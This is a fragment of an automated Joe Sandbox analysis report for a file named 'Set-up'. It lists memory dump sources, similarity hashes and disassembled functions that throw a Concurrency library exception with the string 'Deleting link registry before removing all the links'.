                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC16DAE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionThrow
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1760184552-1123019286
                                                                                              • Opcode ID: 3c49f25eb4ef064482a9c7186c1757d41ce44eac7a2f33e6542b6906ecbe1226
                                                                                              • Instruction ID: dfe61bdd71e9672bba95d673befbafb03067e152c7b08973d608227c32870200
                                                                                              • Opcode Fuzzy Hash: 3c49f25eb4ef064482a9c7186c1757d41ce44eac7a2f33e6542b6906ecbe1226
                                                                                              • Instruction Fuzzy Hash: 23D0A735825108B7DB10EBB4D45AA89BB7CAB8234CF5044B8D51277050F77DD30AD7B1
                                                                                              Function 6BC1B165 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ??0invalid_operation@Concurrency@@QAE@PBD@Z.MSVCR100(Deleting link registry before removing all the links), ref: 6BC1B181
                                                                                              • _CxxThrowException.MSVCR100(6BC12B80,6BC4C880), ref: 6BC1B190
                                                                                              Strings
                                                                                              • Deleting link registry before removing all the links, xrefs: 6BC1B179
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0invalid_operation@Concurrency@@ExceptionThrow
                                                                                              • String ID: Deleting link registry before removing all the links
                                                                                              • API String ID: 1760184552-1123019286
                                                                                              • Opcode ID: 7b441aaac2482b0108a3925c994067c35962a2adfe725a28c4bb9e5544146a04
                                                                                              • Instruction ID: f791bb72d89f49747bc81a8d00f68feeaf786d243fa0e50d4e0b76c736bc7672
                                                                                              • Opcode Fuzzy Hash: 7b441aaac2482b0108a3925c994067c35962a2adfe725a28c4bb9e5544146a04
                                                                                              • Instruction Fuzzy Hash: CCD05E34825204B7DB109BA1D41AB89BB78AB82308F6084A4D5127A150F77DD30A9BB0